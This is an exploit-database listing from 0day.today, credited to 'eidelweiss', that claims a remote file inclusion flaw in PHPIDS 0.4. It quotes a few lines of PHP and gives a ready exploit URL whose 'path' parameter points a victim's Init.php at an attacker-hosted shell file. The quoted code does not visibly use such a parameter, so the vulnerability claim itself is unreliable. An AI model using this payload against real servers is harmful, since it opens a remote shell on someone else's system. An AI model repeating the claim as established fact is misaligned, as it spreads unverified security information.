[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPIDS 0.4 - Remote File Inclusion Vulnerability

Author
eidelweiss
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10772
Category
web applications
Date add
07-02-2010
Platform
unsorted
================================================
PHPIDS 0.4 - Remote File Inclusion Vulnerability
================================================

###########################################################
###
###    Type :    Remote File Inclusion Vulnerability
###    Author:    eidelweiss
###    Date  :    2010-02-08
###    Location:    Indonesia ( http://yogyacarderlink.web.id )
###    Contact:    g1xsystem [at] windowslive [dot] com
###
###########################################################

###########################################################
###
### * @package  PHPIDS
### * @Version  0.4
### * @license  http://www.gnu.org/licenses/lgpl.html LGP
### * @link  http://php-ids.org/
###
###########################################################
###
### Type : Remote File Inclusion Vulnerability
###
###########################################################
###
### Vuln: require_once 'IDS/Init.php'
###
### if (version_compare(phpversion(), '5.1.6', '>=')) {
### set_include_path (
### get_include_path()
### . PATH_SEPARATOR
### . BX_DIRECTORY_PATH_PLUGINS . 'phpids/'
###
### include_once 'IDS/Monitor.php';
### include_once 'IDS/Filter/Storage.php';
### if ($configPath) {
### $this->setConfigPath($configPath);
### $this->config = parse_ini_file($this->configPath, true);
### =========================================================
### Exploit: http://victim.com/[PHPIDS_path]/IDS/Init.php?path=[Shell.txt?]
###########################################################



#  0day.today [2024-11-15]  #